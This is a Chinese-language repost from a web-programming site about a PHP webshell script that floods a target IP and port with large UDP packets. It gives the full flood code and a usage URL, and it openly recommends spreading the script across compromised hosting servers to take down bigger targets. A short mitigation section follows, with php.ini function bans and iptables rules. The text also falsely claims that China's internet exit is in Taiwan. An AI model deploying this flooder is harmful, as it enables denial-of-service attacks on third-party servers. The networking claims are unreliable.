当前位置:七道奇文章资讯网站建设网站编程
日期:2012-01-12 10:11:00  来源:本站整理

PHP利用udp模拟http恳求[网站编程]

赞助商链接



  本文“PHP利用udp模拟http恳求[网站编程]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

因特网由国家网构成,中国国家网出口在台湾,中国国内发送的数据包再多,也要堆积到台湾一个出口再分离到各地.国内的数据再多,对别的国家来说只有台湾一个出口,就仿佛学校局域网,学校内部1g光纤,连网就10m,内部机械D谁都不会到达1g,最高只是10M小水管,无谓的加重台湾那边的出口压力罢了.这叫自己打自己嘴.

这篇文章奉告你,DDoS不是只能拿到服务器才能开始.webshell比服务器多了n多,可以在世界各地.
用来模拟http恳求,发送udp数据包.只有目标服务器带广大于攻击者的才不会受影响.硬防软防屏蔽一概忽视.
当然,标题是分布式,攻击根源自然不是一个,三个500m的服务器的虚拟主机webshell干掉1g带宽的服务器没问题.
用法:
http://www.webshell所在网站.com/xxxx.php?ip=123.234.123.123&port=80&time=99999999999999999


Php工具代码:

  1. <?php 
  2. $packets = 0; 
  3. $ip = $_GET['ip']; 
  4. $rand = $_GET['port']; 
  5. set_time_limit(0); 
  6. ignore_user_abort(FALSE); 
  7.  
  8. $exec_time = $_GET['time']; 
  9.  
  10. $time = time(); 
  11. print "Flooded: $ip on port $rand <br><br>"
  12. $max_time = $time+$exec_time
  13.  
  14. for($i=0;$i<65535;$i++){ 
  15. $out .= "X"
  16. while(1){ 
  17. $packets++; 
  18. if(time() > $max_time){ 
  19. break
  20.  
  21. $fp = fsockopen("udp://$ip"$rand$errno$errstr, 5); 
  22. if($fp){ 
  23. fwrite($fp$out); 
  24. fclose($fp); 
  25. echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging "round($packets/$exec_time, 2) . " packets/s \n"
  26. ?> 


其实工作原理很简单就是通过url传送IP和端口以udp的方法翻开,传送文件到服务器写出,拜候触发后会举行攻击他人服务器的行为.
办理筹划:  window的办理办法是首先终止IIS服务在\php.ini里设置

引用
disable_functions=gzinflate,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,
ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen
然后设allow_url_fopen其值为Off在查抄extension=php_sockets.dll能否有extension=php_sockets.dll然后ok重启IIS.
别的,关于没加密的php攻击代码,还可以用IP战略,或防火墙,禁止全部udp向外发送
linux的,利用 iptables 成立:
iptables -A INPUT -p tcp -m tcp --sport 53 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -p udp -m udp --sport 53 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp -m tcp --sport 1024:65535 -d 8.8.4.4 --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p udp -m udp --sport 1024:65535 -d 8.8.8.8 --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p udp -j REJECT

  改正下php.ini把 allow_url_fopen = Off


  以上是“PHP利用udp模拟http恳求[网站编程]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • PHP利用udp模拟http恳求
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .